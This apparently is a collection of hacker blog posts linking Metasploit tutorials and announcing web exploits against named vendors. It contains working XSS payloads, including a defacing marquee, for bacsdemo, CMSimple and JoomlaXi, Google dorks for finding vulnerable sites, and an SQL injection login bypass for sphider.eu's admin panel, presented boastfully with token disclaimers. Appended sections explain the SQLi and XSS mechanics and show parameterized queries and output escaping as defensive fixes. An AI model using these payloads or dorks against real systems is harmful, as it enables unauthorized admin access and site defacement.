Metasploit tutorial 3 – Database configuration & post exploit affairs

Hi,

Earlier in this Metasploit tutorial series, we covered the basics of the Metasploit Framework (Msf) in Part 1, created a simple exploit on a target system, and used payloads to achieve specific results. In Part 2, we explored the use of the meterpreter post-exploitation tool to create exploits that evade detection.

In this installment of our Metasploit tutorial, we take a detailed look at database configuration in Metasploit, and also touch upon the different post-exploitation phases.

Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:

http://searchsecurity.techtarget.in/tip/Metasploit-tutorial-3-Database-configuration-post-exploit-affairs

Cheers

3ps!l0nLaMbDa

Metasploit tutorial part 2: Using meterpreter

In Part I of our Metasploit tutorial, we covered the basics of the Metasploit Framework (MsF), created a simple exploit on a target system, and used payloads to achieve specific results. The disadvantage of using specific payloads is that alarms may be triggered when a new process starts in the target system. Ideally, a payload should avoid creation of a new process, containing all activity within the scope.

Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:

http://searchsecurity.techtarget.in/tip/Metasploit-tutorial-part-2-Using-meterpreter

Cheers

3ps!l0nLaMbDa

Metasploit tutorial part 1: Inside the Metasploit framework

The Metasploit Framework (Msf) is a free, open source penetration testing solution developed by the open source community and Rapid7. This Metasploit tutorial covers the basic structure of Metasploit and different techniques of information gathering and vulnerability scans using this tool. Metasploit eliminates the need for writing of individual exploits, thus saving considerable time and effort.

The use of Metasploit ranges from defending your own systems by breaking into them, to learning about vulnerabilities that pose a real risk. Download Metasploit from http://www.metasploit.com to maximize the learning from this Metasploit tutorial.

Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:

http://searchsecurity.techtarget.in/tip/Metasploit-tutorial-part-1-Inside-the-Metasploit-framework


Cheers

3ps!l0nLaMbDa

Windows7 hack – shell upload

This is the ms11_003_ie_css_import vulnerability being exploited using Armitage.

Here is the screenshot for the attack.

Thanks and cheers
3psil0nlambdA

SneakPeak @ Metasploit

Hi folks,

This is my white paper on the Metasploit framework.
Contents of the paper:
1. Basics and framework architecture
2. Exploitation with msf
3. Meterpreter using msf
4. Impersonation tokens using incognito
5. Penetration when a victim is behind NAT/Firewall

Here is the link to the PDF:

Metasploit_KarthikR.pdf

Cheers
3psil0nLaMbDa

Zynga.com XSS vulnerability

This is the screenshot of XSS in zynga.com

Cheers
3psil0nlaMbDa

Coupon codes XSSed by me ;)

vendor: www.bacsdemo.com/admindemo/

XSS vulnerability in the admin panel->static page->add new section. In html mode type the following string:

"%3E%3Ciframe src="javascript:alert('XSSed by 3psil0nLamBdA');"%3E%3C/iframe%3E

XSS vulnerability in admin panel->tags->manage tags section.

In the search box type in the following string:

"%3E%3Cmarquee%3E%3Ch1%3EHacker%3C/h1%3E%3C/marquee%3E

The webpage is defaced with the following marquee on the screen. \m/

Cheers

3psil0nLamBdA

sphider.eu hack ~ SQLi vulnerability ~ 3pl0iteD

DISCLAIMER:

The exploit published here is just for educational purposes. 3psil0nLaMdA bears no responsibility whatsoever for the misuse of this.

——————————————————————————————————————————————————

Well guys, the demo of sphider.eu has a sql injection vulnerability.

The exploit is as follows.

username: ' or 0=0 #
Password: ' or 0=0 #
Click log in - And Voila!! You get access to the admin panel ;)

Until next time
3psil0nlambda signing off :)
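
Why that string gets past a login check, and the fix, as an added example that is not part of the original post and is not Sphider's code. The `admins` table, the function names and the account are constructed for illustration; the assumption is a login query built by string concatenation against MySQL.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "' or 0=0 #"  # the string from the post, typed into both fields

def concat_query(user, pw):
    """Vulnerable pattern (hypothetical): input pasted into the SQL text."""
    return f"SELECT 1 FROM admins WHERE username='{user}' AND password='{pw}'"

def mysql_view(sql):
    """Return what MySQL parses: '#' outside a string literal starts a comment."""
    out, in_string = [], False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        elif ch == "#" and not in_string:
            break  # everything after this point is ignored by the server
        out.append(ch)
    return "".join(out).rstrip()

def pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data: one admin account in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = b"constructed-salt"
    conn.execute("INSERT INTO admins VALUES (?, ?, ?)",
                 ("admin", salt, pw_hash("correct horse", salt)))
    return conn

def login(conn, user, password):
    """Hardened: the username is bound as a parameter, never spliced into SQL."""
    row = conn.execute("SELECT salt, pw FROM admins WHERE username = ?",
                       (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], pw_hash(password, row[0]))

if __name__ == "__main__":
    # The password test is commented out and the remaining WHERE is always true.
    print(mysql_view(concat_query(PAYLOAD, PAYLOAD)))
    db = make_db()
    print(login(db, PAYLOAD, PAYLOAD), login(db, "admin", "correct horse"))
```

With the bound parameter the same input is looked up as a literal username, matches no row, and the login is refused.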

CMSimple XSS Vulnerability 3xpl0it

* Persistent XSS vulnerability in CMSIMPLE 3.3
Google dork: Powered by CMSimple

published by: http://packetstormsecurity.org/files/author/8964/

After logging in to the demo with password=test, choose edit mode, then choose
the html button in the toolbox and write the code below, after clearing the
existing code there. A pop-up appears, showing the persistent XSS vulnerability
in the full version.

Exploit: %3CIFRAME SRC="javascript:alert('XSS');"%3E%3C%2FIFRAME%3E

PS: In the demo, as mentioned on the site, the option to write to files has
been disabled, unlike in the full version. So here we can only see how the
script behaves in the layout, which shows the XSS vulnerability; it will be
persistent in the full version once write permissions are allowed.

———————————————————————————–
Thanks to side-effects for his valuable guidance and greets to taashu for her
love and support.

Cheers \m/
3psil0nLambdA

JoomlaXi persistent XSS vulnerabilities

  DISCLAIMER:
  The author bears no responsibility for the misuse of the exploit.
  The exploit is published here, for the educational purpose of how
  to find persistent XSS vulnerabilities in a web application.
  Misuse of Exploits for illegal purpose is a crime and punishable
  under law.
------------------------------------------------------------------------
  JoomlaXi persistent XSS vulnerability
  vendor: www.joomlaxi.com
  Author: 3psil0nLambDa
  Google dork: © 2008-2010 JoomlaXi.

Description about the CMS

JoomlaXi enrich web applications that facilitate interactive 
information sharing, interoperability, user-centered design, 
and collaboration on the World Wide Web. We are committed to 
develop most demanded and required applications in the field 
of Open Source. JoomlaXi was founded for breaking new ground
and giving best solution to this world.

JoomlaXi, A team since 2009, breaking its own limits every time
has a large list of satisfied customers. Team has young, dynamic
& talented team that drives the company passionately towards its
goal.

Persistent XSS vulnerability

Event module in the front end,  persistent XSS vulnerability

Exploit: "%3E%3CIFRAME SRC="javascript:alert('XSS');"%3E%3C%2FIFRAME%3E

Example: Front end demo-> markmessier->events-> type the above tags in 
the input fields and save the event-> View profile 

You'll see a pop-up ;) \m/

Thanks to side-effects for his valuable guidance and greets to taashu 
for her love and support.

Cheers \m/
Until Next time 3psil0nLamBdA signing off
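
Why the strings in the XSS posts above start with `">`, and how output encoding stops them, as an added example that is not part of the original posts or any vendor's code. The `<input>` template and function names are hypothetical; the assumption is that the stored field is echoed back inside an HTML attribute, as in a search box or an event form.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Strings from the posts, as the application sees them after URL-decoding.
SAMPLES = [
    unquote('"%3E%3CIFRAME SRC="javascript:alert(\'XSS\');"%3E%3C%2FIFRAME%3E'),
    unquote('"%3E%3Cmarquee%3E%3Ch1%3EHacker%3C/h1%3E%3C/marquee%3E'),
]

def render_raw(value):
    """Vulnerable pattern (hypothetical template): stored text placed in an attribute as-is."""
    return f'<input name="title" value="{value}">'

def render_escaped(value):
    """Hardened: encode for the HTML attribute context at output time."""
    return f'<input name="title" value="{escape(value, quote=True)}">'

class TagCollector(HTMLParser):
    """Records every element the markup opens, the way a browser would see it."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    for sample in SAMPLES:
        # Raw: the leading "> closes the attribute and tag, so new elements appear.
        # Escaped: the whole string stays inside value="..." and only <input> exists.
        print(tags_in(render_raw(sample)), tags_in(render_escaped(sample)))
```

`tags_in` works as a regression check for any template that echoes user data. A field that is meant to accept HTML, such as an editor's html mode, needs an allow-list sanitizer instead of escaping.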